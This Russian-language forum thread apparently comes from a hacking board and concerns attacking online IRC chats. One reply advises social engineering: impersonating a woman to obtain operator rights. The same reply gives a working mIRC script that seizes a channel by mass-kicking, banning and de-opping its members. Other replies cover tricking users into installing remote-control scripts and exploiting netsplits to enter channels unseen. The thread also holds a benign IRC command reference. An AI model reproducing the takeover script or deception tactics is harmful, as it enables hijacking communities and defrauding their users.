Привет Всем! Я хочу узнать все об IRC чатов. Подаютсья они взлому или нет (онлайн irc чаты)? Какие есть команды в irc чате ? Есть ли полезные сылки на стати или сайты? Если нужна определёная сылка на чат который я хочу вломать,я могу дать. Есть ли особенвые слабости? Построение сылки следошие: www.site/index.php?nick= имя&server=сервер&chan=канал&x=81&y=17 ВНИМАНИЕ ЭТО НЕ ПРОСБА О ВСЛОМЕ! Зарание спасибо за информацию.
Скорее всего ты имеешь в виду онлайн клиенты, уязвимости в этих клиентах не помогут что либо сделать с каналом. Зависит от того какие сервисы есть (/nickserv, /chanserv).
в ирк рулит СИ, пароль там выманить просто, также очень любимм мною метод захвата мелких новоиспеченых каналов - где девушкам дают оператора, заходишь под женским ником, получаешь опа и претворяешь вот такой скрипт состоящий из нескольких разделов ############### alias takeover { %i = 1 mode # +eeee $me mode # +iSpsl 1 while $nick(#,%i) != $null { if ($nick(#,%i) !isin $me ) kick # $nick(#,%i) %quit_msg Kick №: %kickun inc %i } unset %i mode # +b * } on *:unban:#:{ if ($banmask == *!*@*) mode # +b *!*@* } ############ alias massdeop { if ($me !isop #) { %lser Ты не оператор канала. } else { %lse Произвожу масс. ДеОП (-o) на канале # $+ ... set %i 1 :next set %nick $nick(#,%i) if (%nick == $null) goto done if (%nick isop #) && (%nick != $me) { mode # -o %nick } inc %i goto next :done } } ##############alias massdevoice { ;%lse1 Произвожу масс. ДеОП (-o) на канале # $+ ... set %i 1 .cs devoice $chan :next set %nick $nick(#,%i) if (%nick == $null) goto done if (%nick != $me) { .cs devoice $chan %nick } inc %i goto next :done } }
LAEOT, есть в IRC уязвимости как в клиентском ПО, так и в серверном. В зависимости от преследуемой цели следует прорабатывать то либо иное направление, или оба. Для IRC клиента наиболее распространена уязвимость, позволяющая произвести принудительный вывод пользователя из сети. Ещё, с применением СИ можно убедить пользователя установить скрипт дающий удаленное управление клиентом. Для серверного ПО существует множество самых разных баг, например https://forum.antichat.ru/thread47764.html В любом случае важно знать версию ПО и только потом вести дальнейшую проработку. Рекомендую начать с изучения IRC RFC и документации хотя бы Unreal IRCD.
оформление текста: Для того чтобы написать сообщение жирным цветом - нажмите Ctrl+b, а затем напишите своё сообщение. На канале оно будет жирным. Для подчёркивания нажмите Ctrl+u. Для раскраски сообщения в особый цвет нажмите Ctrl+k затем номер цвета (узнаете из подсказки), а при желании, через запятую, и фон сообщения и затем ваше сообщение. Ваша мессага окрасится в нужный вам цвет. Общие команды: /server servername[ort] [password] - команда соединения с сервером servername, port=номер порта (по умолчанию 6667), password необходим в том случае если сервер защищён паролем. /join [-i] #channel [ключ] - заход на канал (атрибут i ставится в том случае, если вы были приглашены на канал). /part #channel, /partall - покидание канала или всех каналов. /nick nickname - смена текущего ника. /list [-min число] | [-max число] - список всех каналов на IRC-сервере. Атрибуты min и max ставятся в том случае, если требуется найти каналы, не превышаюших, или не достигших данного числа. /users - количество пользователей на сервере. /lusers - полная информация о IRC-сервере. /names #channel - позволяет узнать количество людей на канале. /quit причина - уйти с IRC-сервера. /exit - выход из IRC-сервера и закрытие чат-клиента. /msg #channel | nick - передача сообщения на указаный канал или пользователю с указанным ником /me действия - сообщение от первого лица (например: * pupkin пошел гулять. С учётом, что ваш ник - pupkin). /ame действия - то же самое, только происходит передача на все каналы. /away причина - если вам нужно ненадолго уйти, используйте данную команду. Если режим away активен и какой-либо человек, шлёт вам сообщения в приват, он получит сообщение о вашем отсутствии. Чтобы снять режим away, наберите /away без параметров. /query nick - открытие привата с указанным ником. /notice nick | #channel - передача индивидуального сообщение без открытие привата, или каждому юзеру на канале. /whois nick - информация о данном нике. /whowas nick - узнать последний приход данного ника на IRC-сервер. /dns host | ip - узнать ip-адрес или dns-адрес данного ника. /ignore nick!ident@host - поместить данного человека в "игнор-лист". (Также допустим игнор по нику - /ignore nick). /invite #channel nick - пригласить данного ника на указанный канал. CTCP команды: /ctcp nick ping - пинг человека с указанным ником. /ctcp nick finger - финжер человека с указанным ником. /ctcp nick version - версия IRC-клиента у человека с указанным ником. /ctcp nick time - время человека с указанным ником. Команды для операторов канала: /mode #channel mode - атрибуты канала: +t - топик меняют только опы. +p|+s - приватный режим: не видно, что человек находится на данном канале по его информации. Секретный режим: канал не видно в /list. +i - invite only: попасть на канал можно только, если вас пригласили. +m - moderated: без режима голоса (+v), на канале участник не может ничего сказать +n - no external messages: невозможна передача сообщений извне (без захода на канал). +l число - limit: на канал не смогут попасть больше заданного числа участников. +k ключ - key mode: без ввода данного ключа невозможно зайти на канал. /kick #channel nick [причина] - кикнуть человека с данным ником с указанного канала. /mode #channel + | - mode nick - атрибуты ника на указанном канале: o - дать/забрать оп у участника канала. v - дать/забрать голос у участника канала. b nick!ident@host - поставить/снять бан на участника канала. I - поставить/удалить участника из листа приглашённых. e - поставить/удалить участника из expect листа. Команды для IRC-операторов: /oper login password - стать IRC-оператором. /mode nick + | - mode - атрибуты ника на IRC-сервере: -o - перестать быть IRC-оператором. w - режим приёма сообщений от других IRC-операторов. s - режим приема сообщений от IRC-сервера. /kill nick - "убить" человека с данным ником. /kline nick!ident@host - забанить человека на IRC-сервер. /rehash - обновить (с сохранёнными изменениями) IRC-сервер. /restart - перезапуск IRC-сервера. /die - выключить IRC-сервер. Команды IRCX протокола: /mode #channel + | - q nick - дать/забрать овнера. /access #channel add Owner nick!ident@host - добавить овнера на канал. /access #channel delete Owner nick!ident@host - удалить имеющегося овнера с канала. /access #channel clear owner - удалить всех имеющихся овнеров с канала. /access #channel add host nick!ident@host - добавить хост на авто-опа на канал. /access #channel delete host nick!ident@host - удалить хост на авто-опа на канал. /access #channel clear host - удалить все хосты на авто-оп. /access #channel add deny nick!ident@host - добавить запрет на канал. /access #channel delete deny nick!ident@host - удалить запрет на канал. /access #channel clear deny - удалить все запреты на канал. /access #channel list - просмотреть список овнеров, авто-опов и запретов. /access #channel clear -удалить весь список овнеров, авто-опов и запретов. /prop #channel OwnerKey - ввести ключ овнера. /prop #channel HostKey - ввести ключ хоста. /prop #channel memberkey - ввести ключ на канал. /prop #channel topic топик - установить топик на канале. /prop #channel onjoin : текст приветствия - установить текст приветствия на канале. /prop #channel onpart : текст прощания - установить текст прощания на канале.
Привет всем. Спасибо за информатию,много нового научилсья про irc! СИ не поможет, у меня ОЧЕНЬ плохие отношение с админом. Но я уже решил проблему как? : Я поднал рефолуцию на чате и забрал всех ползователей! Значит тут для меня кончилась проблема. Кто хочит что то прибавить или сказать свое мнение,всегда будим ради, как я так и другие новички.
Да, например, во время сплита в сети (можно поменять даже там режимы, в частности поставить для себя +I). При воссоединении сети, восстанавливаются и режимы канала путём плюсования с разных серверов (учитывая, что основные режимы канала могут быть прописаны в mlock)..Тем самым у Вас есть шанс и побывать на канале и даже остаться там какое-то время незамеченным.